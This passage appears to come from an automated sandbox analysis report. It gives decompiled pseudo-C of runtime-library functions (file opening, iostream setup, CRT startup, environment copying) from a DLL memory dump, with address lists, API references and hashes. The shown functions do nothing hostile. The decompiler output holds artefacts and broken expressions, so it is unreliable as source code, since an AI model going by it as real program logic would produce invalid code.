						_push( &_v24);
						_push(_a12);
						memcpy(_t285,  &_v48, _t238 << 2);
						_t196 = 0;
						_t253 = E6E54B0C4();
						_t278 = _t285 + 0x2c;
						_v12 = _t253;
						__eflags = _t253 - 0xffffffff;
						if(_t253 != 0xffffffff) {
							goto L11;
						}
						goto L9;
					} else {
						 *(E6E537E5C(__eflags)) =  *_t184 & 0x00000000;
						 *_t189 = _t264;
						 *((intOrPtr*)(E6E537E6F(__eflags))) = 0x18;
						goto L2;
					}
				} else {
					_t186 = E6E537E5C(_t288);
					 *_t186 =  *_t186 & 0x00000000;
					_t289 =  *_t186;
					 *_a8 = _t264;
					L2:
					return  *((intOrPtr*)(E6E537E6F(_t289)));
				}
			}

0x6e54b42e
0x6e54b432
0x6e54b433
0x6e54b433
0x6e54b433
0x6e54b435
0x6e54b438
0x6e54b43b
0x6e54b456
0x6e54b45b
0x6e54b45e
0x6e54b460
0x6e54b462
0x6e54b481
0x6e54b488
0x6e54b48f
0x6e54b492
0x6e54b49e
0x6e54b4a1
0x6e54b4a9
0x6e54b4aa
0x6e54b4ad
0x6e54b4ad
0x6e54b4af
0x6e54b4b4
0x6e54b4b6
0x6e54b4b9
0x6e54b4c1
0x6e54b4c4
0x6e54b531
0x6e54b532
0x6e54b538
0x6e54b53a
0x6e54b583
0x6e54b586
0x6e54b58f
0x6e54b592
0x6e54b595
0x6e54b597
0x6e54b597
0x6e54b597
0x6e54b588
0x6e54b58b
0x6e54b58b
0x6e54b59c
0x6e54b59f
0x6e54b5ab
0x6e54b5b0
0x6e54b5bc
0x6e54b5c6
0x6e54b5ca
0x6e54b5d4
0x6e54b5d7
0x6e54b5e2
0x6e54b5e7
0x6e54b606
0x6e54b609
0x6e54b60d
0x6e54b60e
0x6e54b614
0x6e54b619
0x6e54b61c
0x6e54b61e
0x6e54b620
0x6e54b625
0x6e54b627
0x6e54b629
0x6e54b62c
0x6e54b62e
0x6e54b648
0x6e54b66c
0x6e54b670
0x6e54b674
0x6e54b676
0x6e54b67a
0x6e54b67c
0x6e54b686
0x6e54b689
0x6e54b690
0x6e54b690
0x6e54b690
0x6e54b690
0x6e54b67a
0x6e54b695
0x6e54b6a1
0x6e54b6a3
0x6e54b72e
0x6e54b72e
0x00000000
0x6e54b6a9
0x6e54b6a9
0x6e54b6ad
0x00000000
0x00000000
0x6e54b6b2
0x6e54b6c4
0x6e54b6cc
0x6e54b6cf
0x6e54b6d0
0x6e54b6d3
0x6e54b6da
0x6e54b6df
0x6e54b6e2
0x6e54b716
0x6e54b720
0x6e54b720
0x6e54b72a
0x00000000
0x6e54b72a
0x6e54b6eb
0x6e54b704
0x6e54b70b
0x6e54b52b
0x00000000
0x6e54b52b
0x6e54b6a3
0x6e54b630
0x00000000
0x6e54b5e9
0x6e54b5f0
0x6e54b5f3
0x6e54b5f5
0x00000000
0x00000000
0x6e54b5f7
0x6e54b5f9
0x6e54b5f9
0x00000000
0x6e54b5ff
0x6e54b5e7
0x6e54b542
0x6e54b545
0x6e54b560
0x6e54b565
0x6e54b56b
0x6e54b56d
0x6e54b578
0x6e54b578
0x00000000
0x6e54b56d
0x6e54b4c6
0x6e54b4cd
0x6e54b4cf
0x6e54b506
0x6e54b506
0x6e54b510
0x6e54b513
0x6e54b51a
0x6e54b51a
0x6e54b51a
0x6e54b526
0x00000000
0x6e54b526
0x6e54b4d1
0x6e54b4d5
0x00000000
0x00000000
0x6e54b4d7
0x6e54b4e6
0x6e54b4eb
0x6e54b4ee
0x6e54b4ef
0x6e54b4f2
0x6e54b4f2
0x6e54b4f9
0x6e54b4fb
0x6e54b4fe
0x6e54b501
0x6e54b504
0x00000000
0x00000000
0x00000000
0x6e54b464
0x6e54b469
0x6e54b46c
0x6e54b473
0x00000000
0x6e54b473
0x6e54b43d
0x6e54b43d
0x6e54b442
0x6e54b442
0x6e54b448
0x6e54b44a
0x00000000
0x6e54b44f

APIs

Part of subcall function 6E54B0C4: CreateFileW.KERNELBASE(00000000,00000000,?,6E54B4B4,?,?,00000000,?,6E54B4B4,00000000,0000000C), ref: 6E54B0E1

GetLastError.KERNEL32 ref: 6E54B51F
__dosmaperr.LIBCMT ref: 6E54B526
GetFileType.KERNELBASE(00000000), ref: 6E54B532
GetLastError.KERNEL32 ref: 6E54B53C
__dosmaperr.LIBCMT ref: 6E54B545
CloseHandle.KERNEL32(00000000), ref: 6E54B565
CloseHandle.KERNEL32(?), ref: 6E54B6B2
GetLastError.KERNEL32 ref: 6E54B6E4
__dosmaperr.LIBCMT ref: 6E54B6EB

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID:
API String ID: 4237864984-0
Opcode ID: 5fad27b421cf8ac0056dafdaa2f7e37136082fd1914cf1d1a4df2d3e665cbb9e
Instruction ID: d8120142197487b1cb34823f97e6db95199502d7fc5e37c8509586d6e9c05580
Opcode Fuzzy Hash: 5fad27b421cf8ac0056dafdaa2f7e37136082fd1914cf1d1a4df2d3e665cbb9e
Instruction Fuzzy Hash: 23A12132A14619DFCF49EFA8C8917EE3BF5AB47324F14015AE811AB399D7318D12CB61

Uniqueness

Uniqueness Score: -1.00%

Function 6E4F7AA0, Relevance: 10.7, APIs: 2, Strings: 4, Instructions: 217
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E6E4F7AA0(intOrPtr* __ecx, intOrPtr _a4, char _a8, intOrPtr _a12, char _a15) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr* _v24;
				signed char _v28;
				char _v32;
				char _v52;
				char _v84;
				intOrPtr* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t82;
				signed char _t96;
				char _t98;
				signed int _t103;
				void* _t106;
				signed int _t111;
				intOrPtr* _t114;
				intOrPtr _t116;
				signed int _t117;
				intOrPtr _t119;
				signed char _t120;
				signed char _t122;
				void* _t123;
				signed int _t124;
				signed char _t125;
				signed char _t127;
				signed char _t135;
				intOrPtr* _t139;
				signed int* _t140;
				signed int* _t144;
				intOrPtr* _t148;
				signed int* _t150;
				void* _t154;
				char* _t157;
				signed int _t158;
				signed int* _t159;
				signed int _t161;
				void* _t163;
				void* _t164;
				void* _t165;
				void* _t166;
				signed int _t168;

				_push(0xffffffff);
				_push(0x6e615859);
				_push( *[fs:0x0]);
				_t164 = _t163 - 0x24;
				_push(_t123);
				_t82 =  *0x6e688c24; // 0x8e9367b0
				_push(_t82 ^ _t161);
				 *[fs:0x0] =  &_v16;
				_t148 = __ecx;
				_v24 = __ecx;
				_t172 = _a12;
				_v20 = 0;
				if(_a12 != 0) {
					 *__ecx = 0x6e61645c;
					 *(__ecx + 0x10) = 0;
					 *(__ecx + 0x30) = 0;
					 *(__ecx + 0x34) = 0;
					 *(__ecx + 0x38) = 0;
					 *((intOrPtr*)(__ecx + 8)) = 0x6e616450;
					_v8 = 0;
					_v20 = 1;
				}
				 *((intOrPtr*)(_t148 +  *((intOrPtr*)( *_t148 + 4)))) = 0x6e616458;
				_t15 =  *((intOrPtr*)( *_t148 + 4)) - 8; // -8
				 *((intOrPtr*)( *((intOrPtr*)( *_t148 + 4)) + _t148 - 4)) = _t15;
				_t154 =  *((intOrPtr*)( *_t148 + 4)) + _t148;
				 *(_t154 + 0x30) = 0;
				 *(_t154 + 8) = 0;
				 *(_t154 + 0x10) = 0;
				 *((intOrPtr*)(_t154 + 0x14)) = 0x201;
				 *((intOrPtr*)(_t154 + 0x18)) = 6;
				 *(_t154 + 0x1c) = 0;
				 *(_t154 + 0x20) = 0;
				 *(_t154 + 0x24) = 0;
				 *(_t154 + 0x28) = 0;
				 *(_t154 + 0x2c) = 0;
				E6E4F8A40(_t123, _t154, _t148, _t161, 0);
				_t124 = E6E52F238(_t154, _t172, 8);
				_t165 = _t164 + 4;
				if(_t124 == 0) {
					_t124 = 0;
					__eflags = 0;
				} else {
					_push(1);
					_v8 = 1;
					_t122 = E6E52E6B2();
					_t165 = _t165 + 4;
					 *(_t124 + 4) = _t122;
				}
				 *(_t154 + 0x30) = _t124;
				 *((intOrPtr*)(_t154 + 0x38)) = _a4;
				 *(_t154 + 0x3c) = 0;
				_t125 =  *(_t124 + 4);
				_v28 = _t125;
				 *((intOrPtr*)( *_t125 + 4))();
				_v8 = 2;
				_t96 = E6E4F7920(_t125,  &_v32);
				_t166 = _t165 + 4;
				_t135 = _t96;
				_t98 =  *((intOrPtr*)( *((intOrPtr*)( *_t96 + 0x20))))(0x20);
				_a15 = _t98;
				_v8 = 0;
				if(_t125 != 0) {
					_t135 = _t125;
					_t120 =  *((intOrPtr*)( *_t125 + 8))();
					if(_t120 != 0) {
						_t135 = _t120;
						 *((intOrPtr*)( *_t120))(1);
					}
					_t98 = _a15;
				}
				 *((char*)(_t154 + 0x40)) = _t98;
				if( *((intOrPtr*)(_t154 + 0x38)) != 0) {
					L11:
					if(_a8 != 0) {
						E6E52EB2E(_t135, _t154);
					}
					 *[fs:0x0] = _v16;
					return _t148;
				} else {
					_t103 =  *(_t154 + 0xc) & 0x00000013 | 0x00000004;
					 *(_t154 + 0xc) = _t103;
					_t135 =  *(_t154 + 0x10) & _t103;
					if(_t135 != 0) {
						__eflags = _t135 & 0x00000004;
						if((_t135 & 0x00000004) == 0) {
							__eflags = _t135 & 0x00000002;
							_t157 =  ==  ? "ios_base::eofbit set" : "ios_base::failbit set";
						} else {
							_t157 = "ios_base::badbit set";
						}
						_t106 = E6E4F8C40( &_v32, 1);
						_t168 = _t166 + 8;
						_t139 =  &_v52;
						E6E4F8100(_t125, _t139, _t148, _t157, _t106);
						E6E530A4A( &_v52, 0x6e68406c);
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						asm("int3");
						_push(_t161);
						_push(0xffffffff);
						_push(0x6e615880);
						_push( *[fs:0x0]);
						_push(_t125);
						_push(_t157);
						_push(_t148);
						_t111 =  *0x6e688c24; // 0x8e9367b0
						_push(_t111 ^ _t168);
						 *[fs:0x0] =  &_v84;
						_t114 = _t139;
						_v88 = _t114;
						 *_t114 = 0x6e616468;
						_t158 = E6E52F238(_t157, __eflags, 8);
						__eflags = _t158;
						if(_t158 == 0) {
							_t158 = 0;
							__eflags = 0;
						} else {
							_push(1);
							_v12 = 0;
							_t119 = E6E52E6B2(); // executed
							 *((intOrPtr*)(_t158 + 4)) = _t119;
						}
						_t116 = _v24;
						_t150 = _t116 + 0x14;
						_t140 = _t116 + 0x18;
						_t144 = _t116 + 0x24;
						 *(_t116 + 0x34) = _t158;
						_t127 = _t116 + 4;
						 *(_t116 + 0xc) = _t127;
						_t159 = _t116 + 8;
						 *(_t116 + 0x10) = _t159;
						 *(_t116 + 0x1c) = _t150;
						 *(_t116 + 0x20) = _t140;
						 *(_t116 + 0x2c) = _t144;
						_t117 = _t116 + 0x28;
						__eflags = _t117;
						_v28 = _t127;
						 *(_v24 + 0x30) = _t117;
						 *_t159 = 0;
						 *_t140 = 0;
						 *_t117 = 0;
						 *_v28 = 0;
						 *_t150 = 0;
						 *_t144 = 0;
						 *[fs:0x0] = _v20;
						return _v24;
					} else {
						goto L11;
					}
				}
			}

0x6e4f7aa3
0x6e4f7aa5
0x6e4f7ab0
0x6e4f7ab1
0x6e4f7ab4
0x6e4f7ab7
0x6e4f7abe
0x6e4f7ac2
0x6e4f7ac8
0x6e4f7aca
0x6e4f7acd
0x6e4f7ad1
0x6e4f7ad8
0x6e4f7ada
0x6e4f7ae0
0x6e4f7ae7
0x6e4f7aee
0x6e4f7af5
0x6e4f7afc
0x6e4f7b03
0x6e4f7b0a
0x6e4f7b0a
0x6e4f7b18
0x6e4f7b24
0x6e4f7b27
0x6e4f7b30
0x6e4f7b34
0x6e4f7b3b
0x6e4f7b42
0x6e4f7b49
0x6e4f7b50
0x6e4f7b57
0x6e4f7b5e
0x6e4f7b65
0x6e4f7b6c
0x6e4f7b73
0x6e4f7b7a
0x6e4f7b86
0x6e4f7b88
0x6e4f7b8d
0x6e4f7ba5
0x6e4f7ba5
0x6e4f7b8f
0x6e4f7b8f
0x6e4f7b91
0x6e4f7b98
0x6e4f7b9d
0x6e4f7ba0
0x6e4f7ba0
0x6e4f7baa
0x6e4f7bad
0x6e4f7bb0
0x6e4f7bb7
0x6e4f7bbc
0x6e4f7bc1
0x6e4f7bc7
0x6e4f7bcf
0x6e4f7bd4
0x6e4f7bd7
0x6e4f7be0
0x6e4f7be2
0x6e4f7be5
0x6e4f7beb
0x6e4f7bef
0x6e4f7bf1
0x6e4f7bf6
0x6e4f7bfa
0x6e4f7bfe
0x6e4f7bfe
0x6e4f7c00
0x6e4f7c00
0x6e4f7c07
0x6e4f7c0a
0x6e4f7c1f
0x6e4f7c23
0x6e4f7c26
0x6e4f7c2b
0x6e4f7c33
0x6e4f7c41
0x6e4f7c0c
0x6e4f7c15
0x6e4f7c18
0x6e4f7c1b
0x6e4f7c1d
0x6e4f7c44
0x6e4f7c47
0x6e4f7c50
0x6e4f7c5d
0x6e4f7c49
0x6e4f7c49
0x6e4f7c49
0x6e4f7c66
0x6e4f7c6b
0x6e4f7c6e
0x6e4f7c73
0x6e4f7c81
0x6e4f7c86
0x6e4f7c87
0x6e4f7c88
0x6e4f7c89
0x6e4f7c8a
0x6e4f7c8b
0x6e4f7c8c
0x6e4f7c8d
0x6e4f7c8e
0x6e4f7c8f
0x6e4f7c90
0x6e4f7c93
0x6e4f7c95
0x6e4f7ca0
0x6e4f7ca4
0x6e4f7ca5
0x6e4f7ca6
0x6e4f7ca7
0x6e4f7cae
0x6e4f7cb2
0x6e4f7cb8
0x6e4f7cba
0x6e4f7cbf
0x6e4f7cca
0x6e4f7ccf
0x6e4f7cd1
0x6e4f7ce9
0x6e4f7ce9
0x6e4f7cd3
0x6e4f7cd3
0x6e4f7cd5
0x6e4f7cdc
0x6e4f7ce4
0x6e4f7ce4
0x6e4f7ceb
0x6e4f7cee
0x6e4f7cf1
0x6e4f7cf4
0x6e4f7cf7
0x6e4f7cfa
0x6e4f7cfd
0x6e4f7d00
0x6e4f7d03
0x6e4f7d06
0x6e4f7d09
0x6e4f7d0c
0x6e4f7d0f
0x6e4f7d0f
0x6e4f7d12
0x6e4f7d18
0x6e4f7d1e
0x6e4f7d24
0x6e4f7d2a
0x6e4f7d33
0x6e4f7d39
0x6e4f7d3f
0x6e4f7d48
0x6e4f7d56
0x00000000
0x00000000
0x00000000
0x6e4f7c1d

APIs

std::locale::_Init.LIBCPMT ref: 6E4F7B98
std::locale::_Init.LIBCPMT ref: 6E4F7CDC

Strings

ios_base::failbit set, xrefs: 6E4F7C53
ios_base::badbit set, xrefs: 6E4F7C49, 6E4F7C72, 6E4F7CA5
Pdan, xrefs: 6E4F7AFC
ios_base::eofbit set, xrefs: 6E4F7C58

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initstd::locale::_
String ID: Pdan$ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1620887387-1794258089
Opcode ID: 2dfb19bc4680b1bfc1bc0cd966ee07e7e5392dbcfa07e00a455d76ffeaef4e6a
Instruction ID: b3d4d11c0d902d0d46fd11c97212f9f9a22f46aa0ee829caf6b5ba3e35beedb6
Opcode Fuzzy Hash: 2dfb19bc4680b1bfc1bc0cd966ee07e7e5392dbcfa07e00a455d76ffeaef4e6a
Instruction Fuzzy Hash: 87819CB1904745DFEB10CFA9C984B9ABBF4FF48704F00856ED9199B781D3B9A905CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6E52F3FC, Relevance: 10.6, APIs: 7, Instructions: 136
COMMON

Download Yara Rule

C-Code - Quality: 87%

			E6E52F3FC(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t34;
				signed int _t40;
				signed int _t41;
				signed int _t45;
				signed char _t54;
				signed int _t56;
				signed int _t58;
				void* _t61;
				void* _t68;
				signed int _t72;
				signed int _t76;
				signed int _t80;
				void* _t82;

				_t68 = __edx;
				_push(0x10);
				_push(0x6e684218);
				E6E530370(__ebx, __edi, __esi);
				_t34 =  *0x6e68b030; // 0x1
				if(_t34 > 0) {
					 *0x6e68b030 = _t34 - 1;
					 *(_t82 - 0x1c) = 1;
					 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
					 *((char*)(_t82 - 0x20)) = E6E52FC79();
					 *(_t82 - 4) = 1;
					__eflags =  *0x6e68b388 - 2;
					if( *0x6e68b388 != 2) {
						E6E5301F3(_t68, 1, __esi, 7);
						asm("int3");
						_push(0xc);
						_push(0x6e684240);
						E6E530370(__ebx, 1, __esi);
						_t72 =  *(_t82 + 0xc);
						__eflags = _t72;
						if(_t72 != 0) {
							L9:
							 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
							__eflags = _t72 - 1;
							if(_t72 == 1) {
								L12:
								_t58 =  *(_t82 + 0x10);
								_t76 = E6E52F5B7( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
								 *(_t82 - 0x1c) = _t76;
								__eflags = _t76;
								if(_t76 != 0) {
									_t41 = E6E52F2A2(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58); // executed
									_t76 = _t41;
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t76;
									if(_t76 != 0) {
										goto L14;
									}
								}
							} else {
								__eflags = _t72 - 2;
								if(_t72 == 2) {
									goto L12;
								} else {
									_t58 =  *(_t82 + 0x10);
									L14:
									_push(_t58);
									_t76 = E6E4F6E30( *((intOrPtr*)(_t82 + 8)), _t72);
									 *(_t82 - 0x1c) = _t76;
									__eflags = _t72 - 1;
									if(_t72 == 1) {
										__eflags = _t76;
										if(_t76 == 0) {
											_push(_t58);
											_t45 = E6E4F6E30( *((intOrPtr*)(_t82 + 8)), _t42);
											__eflags = _t58;
											_t25 = _t58 != 0;
											__eflags = _t25;
											_push((_t45 & 0xffffff00 | _t25) & 0x000000ff);
											E6E52F3FC(_t58, _t68, _t72, _t76, _t25);
											_pop(_t61);
											E6E52F5B7( *((intOrPtr*)(_t82 + 8)), _t76, _t58);
										}
									}
									__eflags = _t72;
									if(_t72 == 0) {
										L19:
										_t76 = E6E52F2A2(_t58, _t61, _t68, _t72, _t76,  *((intOrPtr*)(_t82 + 8)), _t72, _t58);
										 *(_t82 - 0x1c) = _t76;
										__eflags = _t76;
										if(_t76 != 0) {
											_t76 = E6E52F5B7( *((intOrPtr*)(_t82 + 8)), _t72, _t58);
											 *(_t82 - 0x1c) = _t76;
										}
									} else {
										__eflags = _t72 - 3;
										if(_t72 == 3) {
											goto L19;
										}
									}
								}
							}
							 *(_t82 - 4) = 0xfffffffe;
							_t40 = _t76;
						} else {
							__eflags =  *0x6e68b030 - _t72; // 0x1
							if(__eflags > 0) {
								goto L9;
							} else {
								_t40 = 0;
							}
						}
						 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
						return _t40;
					} else {
						E6E52FD44(__ebx, _t61, 1, __esi);
						E6E5301BE();
						E6E530342();
						 *0x6e68b388 =  *0x6e68b388 & 0x00000000;
						 *(_t82 - 4) =  *(_t82 - 4) & 0x00000000;
						E6E52F491();
						_t54 = E6E52FEE5(_t61,  *((intOrPtr*)(_t82 + 8)), 0);
						asm("sbb esi, esi");
						_t80 =  ~(_t54 & 0x000000ff) & 1;
						__eflags = _t80;
						 *(_t82 - 0x1c) = _t80;
						 *(_t82 - 4) = 0xfffffffe;
						E6E52F49E();
						_t56 = _t80;
						goto L4;
					}
				} else {
					_t56 = 0;
					L4:
					 *[fs:0x0] =  *((intOrPtr*)(_t82 - 0x10));
					return _t56;
				}
			}

0x6e52f3fc
0x6e52f3fc
0x6e52f3fe
0x6e52f403
0x6e52f408
0x6e52f40f
0x6e52f416
0x6e52f41e
0x6e52f421
0x6e52f42a
0x6e52f42d
0x6e52f430
0x6e52f437
0x6e52f4a6
0x6e52f4ab
0x6e52f4ac
0x6e52f4ae
0x6e52f4b3
0x6e52f4b8
0x6e52f4bb
0x6e52f4bd
0x6e52f4ce
0x6e52f4ce
0x6e52f4d2
0x6e52f4d5
0x6e52f4e1
0x6e52f4e1
0x6e52f4ee
0x6e52f4f0
0x6e52f4f3
0x6e52f4f5
0x6e52f500
0x6e52f505
0x6e52f507
0x6e52f50a
0x6e52f50c
0x00000000
0x00000000
0x6e52f50c
0x6e52f4d7
0x6e52f4d7
0x6e52f4da
0x00000000
0x6e52f4dc
0x6e52f4dc
0x6e52f512
0x6e52f512
0x6e52f51c
0x6e52f51e
0x6e52f521
0x6e52f524
0x6e52f526
0x6e52f528
0x6e52f52a
0x6e52f52f
0x6e52f534
0x6e52f536
0x6e52f536
0x6e52f53c
0x6e52f53d
0x6e52f542
0x6e52f548
0x6e52f548
0x6e52f528
0x6e52f54d
0x6e52f54f
0x6e52f556
0x6e52f560
0x6e52f562
0x6e52f565
0x6e52f567
0x6e52f573
0x6e52f59b
0x6e52f59b
0x6e52f551
0x6e52f551
0x6e52f554
0x00000000
0x00000000
0x6e52f554
0x6e52f54f
0x6e52f4da
0x6e52f59e
0x6e52f5a5
0x6e52f4bf
0x6e52f4bf
0x6e52f4c5
0x00000000
0x6e52f4c7
0x6e52f4c7
0x6e52f4c7
0x6e52f4c5
0x6e52f5aa
0x6e52f5b6
0x6e52f439
0x6e52f439
0x6e52f43e
0x6e52f443
0x6e52f448
0x6e52f44f
0x6e52f453
0x6e52f45d
0x6e52f469
0x6e52f46b
0x6e52f46b
0x6e52f46d
0x6e52f470
0x6e52f477
0x6e52f47c
0x00000000
0x6e52f47c
0x6e52f411
0x6e52f411
0x6e52f47e
0x6e52f481
0x6e52f48d
0x6e52f48d

APIs

__RTC_Initialize.LIBCMT ref: 6E52F443
___scrt_uninitialize_crt.LIBCMT ref: 6E52F45D

Memory Dump Source

Source File: 00000020.00000002.463216123.000000006E4B1000.00000020.00020000.sdmp, Offset: 6E4B0000, based on PE: true

Associated: 00000020.00000002.463201409.000000006E4B0000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463690977.000000006E616000.00000002.00020000.sdmp Download File
Associated: 00000020.00000002.463844819.000000006E686000.00000008.00020000.sdmp Download File
Associated: 00000020.00000002.463862394.000000006E688000.00000004.00020000.sdmp Download File
Associated: 00000020.00000002.463878395.000000006E68F000.00000002.00020000.sdmp Download File

Similarity

API ID: Initialize___scrt_uninitialize_crt
String ID:
API String ID: 2442719207-0
Opcode ID: 0fe0c50286b4e3e632e117c334a2d5a9192a179da50d2bf849aec2ed8cd50e17
Instruction ID: 4e0628f8a8e5ed9080400bba81cfaf0437b0b450ea8169cf3d6c625160d97e0f
Opcode Fuzzy Hash: 0fe0c50286b4e3e632e117c334a2d5a9192a179da50d2bf849aec2ed8cd50e17
Instruction Fuzzy Hash: 0E41B332E14719AFDB208FE5E940BAE76F9EB85794F204536E91477290D7708D018BF0

Uniqueness

Uniqueness Score: -1.00%

Function 6E53EAF0, Relevance: 9.2, APIs: 6, Instructions: 221
COMMON

Download Yara Rule

C-Code - Quality: 83%

			E6E53EAF0(void* __ebx, intOrPtr* _a4) {
				signed short* _v0;
				intOrPtr* _v8;
				intOrPtr _v12;
				intOrPtr* _v16;
				signed int _v20;
				signed short* _v40;
				intOrPtr _v52;
				intOrPtr* _v88;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t39;
				intOrPtr _t40;
				intOrPtr _t41;
				void* _t43;
				signed int _t47;
				signed int _t53;
				signed short _t54;
				signed int _t55;
				signed int _t56;
				void* _t59;
				void* _t61;
				intOrPtr _t62;
				intOrPtr* _t64;
				signed short _t68;
				signed int _t69;
				intOrPtr* _t70;
				intOrPtr* _t74;
				signed short* _t76;
				void* _t78;
				intOrPtr* _t80;
				intOrPtr* _t85;
				signed short* _t94;
				signed int _t96;
				void* _t97;
				signed int _t105;
				signed short* _t106;
				intOrPtr _t110;
				intOrPtr _t111;
				intOrPtr _t112;
				signed int _t113;
				void* _t115;
				intOrPtr* _t116;
				intOrPtr* _t118;
				intOrPtr* _t120;
				signed short* _t122;
				intOrPtr* _t124;
				void* _t127;
				intOrPtr _t128;
				signed short* _t129;
				signed short* _t131;
				intOrPtr _t132;
				intOrPtr* _t133;
				void* _t137;
				void* _t139;
				void* _t140;

				_push(_t79);
				_t74 = _a4;
				_t110 = 0;
				_t124 = _t74;
				_t33 =  *_t74;
				while(_t33 != 0) {
					if(_t33 != 0x3d) {
						_t110 = _t110 + 1;
					}
					_t80 = _t124;
					_t115 = _t80 + 1;
					do {
						_t34 =  *_t80;
						_t80 = _t80 + 1;
					} while (_t34 != 0);
					_t124 = _t124 + 1 + _t80 - _t115;
					_t33 =  *_t124;
				}
				_t3 = _t110 + 1; // 0x1
				_t116 = E6E544550(_t3, 4);
				if(_t116 == 0) {
					L19:
					_t116 = 0;
					goto L20;
				} else {
					_v8 = _t116;
					while(1) {
						_t111 =  *_t74;
						if(_t111 == 0) {
							break;
						}
						_t85 = _t74;
						_t127 = _t85 + 1;
						do {
							_t39 =  *_t85;
							_t85 = _t85 + 1;
						} while (_t39 != 0);
						_t40 = _t85 - _t127 + 1;
						_v12 = _t40;
						if(_t111 == 0x3d) {
							L15:
							_t74 = _t74 + _t40;
							continue;
						} else {
							_t41 = E6E544550(_t40, 1); // executed
							_t128 = _t41;
							if(_t128 == 0) {
								_push(_t116);
								L44();
								E6E541B83(0);
								goto L19;
							} else {
								_t43 = E6E53F3D0(_t128, _v12, _t74);
								_t139 = _t139 + 0xc;
								if(_t43 != 0) {
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									_push(0);
									E6E53498C();
									asm("int3");
									_t137 = _t139;
									_t140 = _t139 - 0xc;
									_push(_t74);
									_t76 = _v40;
									_v52 = 0;
									_t112 = 0;
									_push(_t128);
									_push(_t116);
									_t47 =  *_t76 & 0x0000ffff;
									_t129 = _t76;
									if(_t47 != 0) {
										_t105 = _t47;
										_t78 = 0x3d;
										do {
											if(_t105 != _t78) {
												_t112 = _t112 + 1;
											}
											_t106 = _t129;
											_t14 =  &(_t106[1]); // 0x2
											_t122 = _t14;
											do {
												_t68 =  *_t106;
												_t106 =  &(_t106[1]);
											} while (_t68 != _v12);
											_t129 =  &(( &(_t129[_t106 - _t122 >> 1]))[1]);
											_t69 =  *_t129 & 0x0000ffff;
											_t105 = _t69;
										} while (_t69 != 0);
										_t76 = _v0;
									}
									_t19 = _t112 + 1; // 0x1
									_t118 = E6E544550(_t19, 4);
									if(_t118 == 0) {
										L42:
										E6E541B83(0);
										return _t118;
									} else {
										_t53 =  *_t76 & 0x0000ffff;
										_v16 = _t118;
										if(_t53 != 0) {
											_t113 = _t53;
											do {
												_t94 = _t76;
												_t21 =  &(_t94[1]); // 0x2
												_t131 = _t21;
												do {
													_t54 =  *_t94;
													_t94 =  &(_t94[1]);
												} while (_t54 != _v12);
												_t96 = _t94 - _t131 >> 1;
												_t23 = _t96 + 1; // -1
												_t55 = _t23;
												_t97 = 0x3d;
												_v20 = _t55;
												if(_t113 == _t97) {
													goto L39;
												} else {
													_t132 = E6E544550(_t55, 2);
													if(_t132 == 0) {
														_push(_t118);
														L44();
														_t118 = 0;
														E6E541B83(0);
														goto L42;
													} else {
														_t59 = E6E546B92(_t132, _v20, _t76);
														_t140 = _t140 + 0xc;
														if(_t59 != 0) {
															_push(0);
															_push(0);
															_push(0);
															_push(0);
															_push(0);
															_t61 = E6E53498C();
															asm("int3");
															_push(_t137);
															_push(_t132);
															_t133 = _v88;
															if(_t133 != 0) {
																_t62 =  *_t133;
																_push(_t118);
																_t120 = _t133;
																while(_t62 != 0) {
																	E6E541B83(_t62);
																	_t120 = _t120 + 4;
																	_t62 =  *_t120;
																}
																_t61 = E6E541B83(_t133);
															}
															return _t61;
														} else {
															_t64 = _v16;
															 *_t64 = _t132;
															_v16 = _t64 + 4;
															E6E541B83(0);
															_t55 = _v20;
															goto L39;
														}
													}
												}
												goto L50;
												L39:
												_t76 =  &(_t76[_t55]);
												_t56 =  *_t76 & 0x0000ffff;
												_t113 = _t56;
											} while (_t56 != 0);
										}
										goto L42;
									}
								} else {
									_t70 = _v8;
									 *_t70 = _t128;
									_v8 = _t70 + 4;
									E6E541B83(0);
									_t40 = _v12;
									goto L15;
								}
							}
						}
						goto L50;
					}
					L20:
					E6E541B83(0);
					return _t116;
				}
				L50:
			}

0x6e53eaf6
0x6e53eaf8
0x6e53eafb
0x6e53eaff
0x6e53eb01
0x6e53eb1d
0x6e53eb07
0x6e53eb09
0x6e53eb09
0x6e53eb0a
0x6e53eb0c
0x6e53eb0f
0x6e53eb0f
0x6e53eb11
0x6e53eb12
0x6e53eb19
0x6e53eb1b
0x6e53eb1b
0x6e53eb21
